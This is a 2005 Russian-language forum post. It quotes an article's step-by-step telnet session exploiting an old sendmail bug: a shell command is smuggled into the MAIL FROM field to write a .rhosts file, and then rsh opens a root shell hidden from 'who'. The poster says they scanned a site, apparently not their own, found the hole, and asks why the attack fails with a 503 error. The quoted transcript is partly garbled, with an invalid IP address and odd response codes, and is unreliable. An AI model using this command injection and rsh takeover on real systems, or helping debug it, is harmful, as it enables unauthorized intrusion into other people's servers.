| CunningFox |
13.04.2005 17:21 |
telnet 25-ый порт
имеется следующася статья
Цитата:
ПРИМЕР 1
crack% telnet target.remote.com 25
Connecting to 123.456.654.321.
! соединяемся по порту 25 - это SMTP
220 sendmail SMI / 4.3.5.2 ready
! версия, которая как известно, содержит ошибку.
helo xxx
220 Helo xxx, (crack.edu)
mail from: |echo crack.edu / .rhosts@target.remote.com
! подставляем команду вместо обратного адреса.
200 Sender ok.
rcpt to : nosuchuser
! вводим заранее неправильного адресата
500 nosuchuser: user unknown
! несмотря на сообщение, продолжаем диалог.
data
230 Enter mail,
end with .
200 Mail accepted
! все, машина взломана....
quit
crack% su
! А теперь залезаем так, чтобы нас не было видно через who
#0rsh target.remote.com / bin / csh - i
Welcome to remote.com!
Warning! No access to terminal, job control disabled!
target#0
Эта ошибка присутствует в нескольких десятках различных вариантов ОС Unix самых разных фирм. Кроме того, существуют и более простые способы при благоприятных условиях: удаленная машина Sun, система SunOS 4, NIS не запущен, система поставлена, и ничего не исправлялось.
|
я просканил один сайт там как раз нашлась данная уязвимость..
всё делаю как в статье, но после ввода data вылетает следующие:
503 5.0.0 Need RCPT <recipient>
в чём лага?
|